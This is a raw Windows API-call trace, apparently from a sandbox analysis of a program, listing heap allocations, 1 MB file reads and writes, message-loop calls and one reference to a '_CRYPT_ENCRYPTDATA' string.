[0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0197.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0197.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1194020 | out: hHeap=0x970000) returned 1 [0197.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0197.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0197.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0197.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0197.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x107f020 | out: hHeap=0x970000) returned 1 [0197.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0197.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0197.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0197.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0197.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0197.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x13bd020 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0197.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf60020 | out: hHeap=0x970000) returned 1 [0197.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0197.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0197.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0197.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0197.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0197.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0197.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0197.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50020 | out: hHeap=0x970000) returned 1 [0197.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0197.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe50020 [0197.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x14ce020 | out: hHeap=0x970000) returned 1 [0197.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0197.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0197.725] TranslateMessage (lpMsg=0x8cf708) returned 0 [0197.725] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0197.726] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0197.726] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0197.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0197.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0197.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0197.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0197.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0197.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0197.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0197.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0197.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0197.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0197.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0197.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0197.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0197.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0197.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf62020 [0197.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0197.780] WriteFile (in: hFile=0x2a0, lpBuffer=0xf62020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf62020*, lpNumberOfBytesWritten=0x8cf5e4*=0x100000, lpOverlapped=0x0) returned 1 [0197.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0197.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf62020 | out: hHeap=0x970000) returned 1 [0197.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0197.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0197.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0197.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0197.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0197.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0197.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0197.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0197.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0197.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0197.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0197.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0197.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0197.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0197.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0197.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0197.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0197.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0197.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0197.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0197.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0197.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0197.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0197.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0197.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf62020 [0197.933] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.946] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.948] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.959] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.961] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.964] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.966] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.967] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.969] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.972] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.974] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.976] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.978] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.980] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.982] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.984] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0197.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0197.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0197.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0197.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0197.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x107a020 [0198.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf62020 | out: hHeap=0x970000) returned 1 [0198.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0198.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0198.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0198.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50020 | out: hHeap=0x970000) returned 1 [0198.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0198.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0198.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5e020 [0198.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x107a020 | out: hHeap=0x970000) returned 1 [0198.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0198.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0198.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0198.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0198.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0198.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0198.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf6f020 [0198.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0198.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6f020 | out: hHeap=0x970000) returned 1 [0198.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0198.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0198.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0198.109] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0198.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0198.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0198.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0198.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0198.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0198.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0198.109] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0198.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0198.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0198.110] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0198.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0198.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0198.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dd8 [0198.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0198.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0198.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0198.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0198.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf65020 [0198.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0198.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0198.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0198.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0198.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0198.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e08 [0198.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0198.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0198.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0198.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e68 [0198.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0198.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0198.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0198.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0198.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0198.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0198.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0198.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0198.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0198.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x107c020 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0198.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 